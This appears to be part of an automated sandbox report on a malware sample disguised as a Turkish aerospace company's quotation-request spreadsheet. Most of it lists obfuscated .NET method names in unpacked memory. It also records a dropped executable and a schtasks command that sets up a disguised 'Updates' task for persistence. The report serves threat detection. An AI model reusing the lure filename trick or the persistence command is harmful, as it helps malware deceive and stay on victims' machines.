Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, f9q9we5WEOkHCUbSS8.cs	High entropy of concatenated method names: 'etjg9dcBN', 'h2rdPnaEf', 'emYSDtjcX', 'GTZ7OBMwQ', 'BPv9tjrTf', 'Oh8qGdJor', 'fDHZWfiXMZuLhjEBy8', 'kSBwj0fHdCtIHLAdvi', 'peoQAmwKi', 'xYDj9cvQI'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, G8jNSB92oZfnX2HKm2.cs	High entropy of concatenated method names: 'v8xLdJDgZn', 'zVXLSQ5tIb', 'sRPLb34E7J', 'tm5L9jxnjh', 'O88L1IjPvi', 'pDMLFoJHcG', 'geeLMsMl3I', 'fT8LQcAONT', 't1BLuwr7LN', 'WGDLj6jKkS'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, soPyQMTbL8lM5TQHkR.cs	High entropy of concatenated method names: 'rkv2voGWH9', 'aaE2IHA3TQ', 'ghS2rH91eS', 'ToString', 'HLN2xdjW6Q', 'PRy2PJv09I', 'NbeqTKhmJVkFD3wWD1h', 'WROJPnh2dZkVxSyaxuB', 'udoCFEh6bC4pbjQGORM'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, NMrfmOvdAmj7dFUB9s.cs	High entropy of concatenated method names: 'ToString', 'eiZFEss2Fs', 'uB6FmutTEE', 'EJoFebJiAc', 'P9iFJFByCl', 'fcDFtxbdmm', 'EK7FTtjtGg', 'ti4FnFXqMm', 'kpJFwleopV', 'skGFBBqkM6'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, T2jEttffFsbbJVuRWm.cs	High entropy of concatenated method names: 'LQtuU4ypSE', 'UioumWwjst', 'YDgueUbc4H', 'mvwuJHfFVw', 's7Wut9AdMd', 'o4CuTsVduI', 'K9uungejcl', 'HT1uwUOSpS', 'TdHuBNPMnG', 'Ktoucj3q2w'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, LfUsopiDSj17gx4YBa.cs	High entropy of concatenated method names: 'Dispose', 'mV0pfetVwL', 'fP05m30fUQ', 'yZeYHft58s', 'ELJpoSmffB', 'B0JpzRsTbA', 'ProcessDialogKey', 'OlI5l2jEtt', 'XFs5pbbJVu', 'kWm55JaNmi'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, LxU94UppiMQcmvaDIT2.cs	High entropy of concatenated method names: 'rNcjoflIKs', 'UtBjznx90p', 'PQTHlYoFpa', 'EmTHpc9rQa', 'Sq0H5RYrGH', 'ctHHALnmY2', 'yJ7HsABjXn', 'P3WHWI1OZf', 'fRQHZD9AcZ', 'D88HiP9hqa'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, XSC45GRfM1SSKcDUtG.cs	High entropy of concatenated method names: 'S7dAWRW0as', 'SfyAZPdgjk', 'KtfAiUVQEH', 'AxrALKviK9', 'Du4A6NOEPT', 'KqnA2y3t0x', 'IaxAOCgR7X', 'a8KARfd0sS', 'ejDAGBFNKX', 's6RAXlAHKJ'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, O08or7psCSBfFZSdPeL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OnlVuFopnb', 'uhXVjORM2x', 'xLLVHLaOgE', 'zusVVCnq6N', 'JEbVyeTLD3', 'iUNVDG1u2A', 'VasVhCwWq5'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, iCcs8YPAkCV0etVwL9.cs	High entropy of concatenated method names: 'u9Eu1uSUKS', 'X3HuMrkaVY', 'icNuufihhU', 'arluHY9ghP', 'cIduySfnxL', 'l65uhWNKbL', 'Dispose', 'BAYQZ1t4MJ', 'BbWQiYfbuN', 'XFxQLDy4ny'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, w90A1jnMoPf4Br66m9.cs	High entropy of concatenated method names: 'akjOZ8JEdN', 'i8fOLCtmSK', 'bmuO2uX4Ac', 'gJ52oNpuBj', 'S9T2z9HWtZ', 'uCqOlYakR3', 'roWOpJnnt4', 'S7BO579Se9', 'cI5OAMwHcY', 'GDFOsnv25Y'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, kJCm3784MdIr1AhtcP.cs	High entropy of concatenated method names: 'G2W1c740n3', 'O3W1aJlKYj', 't3d18yya1r', 'MtI1NC6O1O', 'O1v1mS75We', 'tR01eltXtb', 'XHL1Jkwqu0', 'xNH1tZp5PT', 'zer1TXwIZv', 'er51nCTVV2'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, ua2Hibx6ZJxZHLkI9Q.cs	High entropy of concatenated method names: 'ukwM4yHtXq', 'VgVMow7fbV', 'p48QlRXELa', 'lbxQp67g6E', 'ixAMEFs6jL', 'RGXMapE1pw', 'LHWM3sarus', 'GOsM8RR4Qa', 'rnlMNPfsBA', 'cCXMvbhd0K'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, Ygu3V0U7WENZpiB0Rh.cs	High entropy of concatenated method names: 'ySC2WsowAC', 'sv72ijQ4UK', 'eGw26iHp2Z', 'Ypf2OjGADx', 'eNo2RBphWP', 'OAY6rUpdZG', 'Eti6xFxQUJ', 'Gxl6Pqc8ii', 'X1p64IBIiN', 'NFC6fYdHgu'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, kkyuEWbsq1ZCQwxdXQ.cs	High entropy of concatenated method names: 'zc7i8Zj4b6', 'J9jiN6plHO', 'O7uivxlZUT', 'HF1iIqYIfH', 'AQ7irTOqon', 'O7pixwbwwj', 'O16iPqHe0Q', 'dWdi4wDe2E', 'm8lifZKbk2', 'xNjioFLKnM'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, aqyGOlBN8CM3jEJht0.cs	High entropy of concatenated method names: 'C1ZO06crM9', 'hJJOKy1ofn', 'NP5OgRhY8W', 'qXUOdgHUpH', 'X3AOYtaNYZ', 'SDOOSfbL5W', 'oZpO7d0KUZ', 'r91ObT03r6', 'PjVO9qS0fp', 'jE9OquDVuU'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, HMrRYozAd8caEdwjOH.cs	High entropy of concatenated method names: 'WvrjSreHnb', 'i7Ajb2r2lg', 'We2j9ZEbFP', 'rVHjUy3Ub6', 'nq4jmyiUp2', 'l4pjJXtA14', 'CaWjte75G4', 'crmjhs7Jwp', 'SUDj0x7yQZ', 'UgajKDqSCy'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, n3gWy0IkhZMqDGVwnx.cs	High entropy of concatenated method names: 'vZGMX9qPSP', 'RY7MCA1msi', 'ToString', 'I44MZZ3h44', 'SbSMi9MXS6', 'qp0MLC07TA', 'HXDM6rICkj', 'a8tM2Sn9Mj', 'j7QMOOdDXj', 'c5JMRN8yRt'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, y0d6quslK3NXUumYtW.cs	High entropy of concatenated method names: 'TZRpOkyuEW', 'dq1pRZCQwx', 'M2opXZfnX2', 'tKmpC2BciG', 'ry2p1v9ogu', 'QV0pF7WENZ', 'vdPcvCPNtSEk4NdTsN', 'jGwOYOKbQ04d0RXYdM', 'No9ppakQ4O', 'PVSpAlZNRk'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, UE0SrmplFAtSaQ8Im96.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Y25jElbAGt', 'dXTjadMZq3', 'UYlj30vMIO', 'wETj8u5aD7', 'uMTjNyLJey', 'qbpjvkC6DO', 't8TjIAUrlm'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, SmAv1s3xG5ELJWCDwm.cs	High entropy of concatenated method names: 'oLJkbnXnEn', 'Okek9gavU2', 'fEEkUot656', 'D1MkmVcBnf', 'cA1kJ1Stss', 'TD0ktTZEEE', 'hFOknyDknn', 'GX6kw33NMO', 'JOvkcuG767', 'h4bkEQDMOi'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, MciGssqEFELlbQy2v9.cs	High entropy of concatenated method names: 'ipM6YWn7eh', 'ai3676Ti5d', 'djdLeVH5kx', 'wHpLJ1xKlC', 'cDGLt26Fjg', 'CSZLTskR5t', 'wusLn2968j', 'xkSLwFT82X', 'Yt7LBi5Pru', 'splLcw5ZPO'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, f9q9we5WEOkHCUbSS8.cs	High entropy of concatenated method names: 'etjg9dcBN', 'h2rdPnaEf', 'emYSDtjcX', 'GTZ7OBMwQ', 'BPv9tjrTf', 'Oh8qGdJor', 'fDHZWfiXMZuLhjEBy8', 'kSBwj0fHdCtIHLAdvi', 'peoQAmwKi', 'xYDj9cvQI'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, G8jNSB92oZfnX2HKm2.cs	High entropy of concatenated method names: 'v8xLdJDgZn', 'zVXLSQ5tIb', 'sRPLb34E7J', 'tm5L9jxnjh', 'O88L1IjPvi', 'pDMLFoJHcG', 'geeLMsMl3I', 'fT8LQcAONT', 't1BLuwr7LN', 'WGDLj6jKkS'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, soPyQMTbL8lM5TQHkR.cs	High entropy of concatenated method names: 'rkv2voGWH9', 'aaE2IHA3TQ', 'ghS2rH91eS', 'ToString', 'HLN2xdjW6Q', 'PRy2PJv09I', 'NbeqTKhmJVkFD3wWD1h', 'WROJPnh2dZkVxSyaxuB', 'udoCFEh6bC4pbjQGORM'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, NMrfmOvdAmj7dFUB9s.cs	High entropy of concatenated method names: 'ToString', 'eiZFEss2Fs', 'uB6FmutTEE', 'EJoFebJiAc', 'P9iFJFByCl', 'fcDFtxbdmm', 'EK7FTtjtGg', 'ti4FnFXqMm', 'kpJFwleopV', 'skGFBBqkM6'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, T2jEttffFsbbJVuRWm.cs	High entropy of concatenated method names: 'LQtuU4ypSE', 'UioumWwjst', 'YDgueUbc4H', 'mvwuJHfFVw', 's7Wut9AdMd', 'o4CuTsVduI', 'K9uungejcl', 'HT1uwUOSpS', 'TdHuBNPMnG', 'Ktoucj3q2w'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, LfUsopiDSj17gx4YBa.cs	High entropy of concatenated method names: 'Dispose', 'mV0pfetVwL', 'fP05m30fUQ', 'yZeYHft58s', 'ELJpoSmffB', 'B0JpzRsTbA', 'ProcessDialogKey', 'OlI5l2jEtt', 'XFs5pbbJVu', 'kWm55JaNmi'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, LxU94UppiMQcmvaDIT2.cs	High entropy of concatenated method names: 'rNcjoflIKs', 'UtBjznx90p', 'PQTHlYoFpa', 'EmTHpc9rQa', 'Sq0H5RYrGH', 'ctHHALnmY2', 'yJ7HsABjXn', 'P3WHWI1OZf', 'fRQHZD9AcZ', 'D88HiP9hqa'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, XSC45GRfM1SSKcDUtG.cs	High entropy of concatenated method names: 'S7dAWRW0as', 'SfyAZPdgjk', 'KtfAiUVQEH', 'AxrALKviK9', 'Du4A6NOEPT', 'KqnA2y3t0x', 'IaxAOCgR7X', 'a8KARfd0sS', 'ejDAGBFNKX', 's6RAXlAHKJ'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, O08or7psCSBfFZSdPeL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OnlVuFopnb', 'uhXVjORM2x', 'xLLVHLaOgE', 'zusVVCnq6N', 'JEbVyeTLD3', 'iUNVDG1u2A', 'VasVhCwWq5'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, iCcs8YPAkCV0etVwL9.cs	High entropy of concatenated method names: 'u9Eu1uSUKS', 'X3HuMrkaVY', 'icNuufihhU', 'arluHY9ghP', 'cIduySfnxL', 'l65uhWNKbL', 'Dispose', 'BAYQZ1t4MJ', 'BbWQiYfbuN', 'XFxQLDy4ny'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, w90A1jnMoPf4Br66m9.cs	High entropy of concatenated method names: 'akjOZ8JEdN', 'i8fOLCtmSK', 'bmuO2uX4Ac', 'gJ52oNpuBj', 'S9T2z9HWtZ', 'uCqOlYakR3', 'roWOpJnnt4', 'S7BO579Se9', 'cI5OAMwHcY', 'GDFOsnv25Y'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, kJCm3784MdIr1AhtcP.cs	High entropy of concatenated method names: 'G2W1c740n3', 'O3W1aJlKYj', 't3d18yya1r', 'MtI1NC6O1O', 'O1v1mS75We', 'tR01eltXtb', 'XHL1Jkwqu0', 'xNH1tZp5PT', 'zer1TXwIZv', 'er51nCTVV2'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, ua2Hibx6ZJxZHLkI9Q.cs	High entropy of concatenated method names: 'ukwM4yHtXq', 'VgVMow7fbV', 'p48QlRXELa', 'lbxQp67g6E', 'ixAMEFs6jL', 'RGXMapE1pw', 'LHWM3sarus', 'GOsM8RR4Qa', 'rnlMNPfsBA', 'cCXMvbhd0K'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, Ygu3V0U7WENZpiB0Rh.cs	High entropy of concatenated method names: 'ySC2WsowAC', 'sv72ijQ4UK', 'eGw26iHp2Z', 'Ypf2OjGADx', 'eNo2RBphWP', 'OAY6rUpdZG', 'Eti6xFxQUJ', 'Gxl6Pqc8ii', 'X1p64IBIiN', 'NFC6fYdHgu'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, kkyuEWbsq1ZCQwxdXQ.cs	High entropy of concatenated method names: 'zc7i8Zj4b6', 'J9jiN6plHO', 'O7uivxlZUT', 'HF1iIqYIfH', 'AQ7irTOqon', 'O7pixwbwwj', 'O16iPqHe0Q', 'dWdi4wDe2E', 'm8lifZKbk2', 'xNjioFLKnM'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, aqyGOlBN8CM3jEJht0.cs	High entropy of concatenated method names: 'C1ZO06crM9', 'hJJOKy1ofn', 'NP5OgRhY8W', 'qXUOdgHUpH', 'X3AOYtaNYZ', 'SDOOSfbL5W', 'oZpO7d0KUZ', 'r91ObT03r6', 'PjVO9qS0fp', 'jE9OquDVuU'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, HMrRYozAd8caEdwjOH.cs	High entropy of concatenated method names: 'WvrjSreHnb', 'i7Ajb2r2lg', 'We2j9ZEbFP', 'rVHjUy3Ub6', 'nq4jmyiUp2', 'l4pjJXtA14', 'CaWjte75G4', 'crmjhs7Jwp', 'SUDj0x7yQZ', 'UgajKDqSCy'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, n3gWy0IkhZMqDGVwnx.cs	High entropy of concatenated method names: 'vZGMX9qPSP', 'RY7MCA1msi', 'ToString', 'I44MZZ3h44', 'SbSMi9MXS6', 'qp0MLC07TA', 'HXDM6rICkj', 'a8tM2Sn9Mj', 'j7QMOOdDXj', 'c5JMRN8yRt'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, y0d6quslK3NXUumYtW.cs	High entropy of concatenated method names: 'TZRpOkyuEW', 'dq1pRZCQwx', 'M2opXZfnX2', 'tKmpC2BciG', 'ry2p1v9ogu', 'QV0pF7WENZ', 'vdPcvCPNtSEk4NdTsN', 'jGwOYOKbQ04d0RXYdM', 'No9ppakQ4O', 'PVSpAlZNRk'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, UE0SrmplFAtSaQ8Im96.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Y25jElbAGt', 'dXTjadMZq3', 'UYlj30vMIO', 'wETj8u5aD7', 'uMTjNyLJey', 'qbpjvkC6DO', 't8TjIAUrlm'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, SmAv1s3xG5ELJWCDwm.cs	High entropy of concatenated method names: 'oLJkbnXnEn', 'Okek9gavU2', 'fEEkUot656', 'D1MkmVcBnf', 'cA1kJ1Stss', 'TD0ktTZEEE', 'hFOknyDknn', 'GX6kw33NMO', 'JOvkcuG767', 'h4bkEQDMOi'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, MciGssqEFELlbQy2v9.cs	High entropy of concatenated method names: 'ipM6YWn7eh', 'ai3676Ti5d', 'djdLeVH5kx', 'wHpLJ1xKlC', 'cDGLt26Fjg', 'CSZLTskR5t', 'wusLn2968j', 'xkSLwFT82X', 'Yt7LBi5Pru', 'splLcw5ZPO'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, f9q9we5WEOkHCUbSS8.cs	High entropy of concatenated method names: 'etjg9dcBN', 'h2rdPnaEf', 'emYSDtjcX', 'GTZ7OBMwQ', 'BPv9tjrTf', 'Oh8qGdJor', 'fDHZWfiXMZuLhjEBy8', 'kSBwj0fHdCtIHLAdvi', 'peoQAmwKi', 'xYDj9cvQI'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, G8jNSB92oZfnX2HKm2.cs	High entropy of concatenated method names: 'v8xLdJDgZn', 'zVXLSQ5tIb', 'sRPLb34E7J', 'tm5L9jxnjh', 'O88L1IjPvi', 'pDMLFoJHcG', 'geeLMsMl3I', 'fT8LQcAONT', 't1BLuwr7LN', 'WGDLj6jKkS'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, soPyQMTbL8lM5TQHkR.cs	High entropy of concatenated method names: 'rkv2voGWH9', 'aaE2IHA3TQ', 'ghS2rH91eS', 'ToString', 'HLN2xdjW6Q', 'PRy2PJv09I', 'NbeqTKhmJVkFD3wWD1h', 'WROJPnh2dZkVxSyaxuB', 'udoCFEh6bC4pbjQGORM'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, NMrfmOvdAmj7dFUB9s.cs	High entropy of concatenated method names: 'ToString', 'eiZFEss2Fs', 'uB6FmutTEE', 'EJoFebJiAc', 'P9iFJFByCl', 'fcDFtxbdmm', 'EK7FTtjtGg', 'ti4FnFXqMm', 'kpJFwleopV', 'skGFBBqkM6'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, T2jEttffFsbbJVuRWm.cs	High entropy of concatenated method names: 'LQtuU4ypSE', 'UioumWwjst', 'YDgueUbc4H', 'mvwuJHfFVw', 's7Wut9AdMd', 'o4CuTsVduI', 'K9uungejcl', 'HT1uwUOSpS', 'TdHuBNPMnG', 'Ktoucj3q2w'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, LfUsopiDSj17gx4YBa.cs	High entropy of concatenated method names: 'Dispose', 'mV0pfetVwL', 'fP05m30fUQ', 'yZeYHft58s', 'ELJpoSmffB', 'B0JpzRsTbA', 'ProcessDialogKey', 'OlI5l2jEtt', 'XFs5pbbJVu', 'kWm55JaNmi'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, LxU94UppiMQcmvaDIT2.cs	High entropy of concatenated method names: 'rNcjoflIKs', 'UtBjznx90p', 'PQTHlYoFpa', 'EmTHpc9rQa', 'Sq0H5RYrGH', 'ctHHALnmY2', 'yJ7HsABjXn', 'P3WHWI1OZf', 'fRQHZD9AcZ', 'D88HiP9hqa'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, XSC45GRfM1SSKcDUtG.cs	High entropy of concatenated method names: 'S7dAWRW0as', 'SfyAZPdgjk', 'KtfAiUVQEH', 'AxrALKviK9', 'Du4A6NOEPT', 'KqnA2y3t0x', 'IaxAOCgR7X', 'a8KARfd0sS', 'ejDAGBFNKX', 's6RAXlAHKJ'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, O08or7psCSBfFZSdPeL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OnlVuFopnb', 'uhXVjORM2x', 'xLLVHLaOgE', 'zusVVCnq6N', 'JEbVyeTLD3', 'iUNVDG1u2A', 'VasVhCwWq5'

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	File created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exe
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	File created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exe
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	File created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exe
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	File created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exe
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	File created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	File created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	File created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	File created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exe	Jump to behavior

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

File created: C:\Users\user\AppData\Roaming\WheTgQY.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
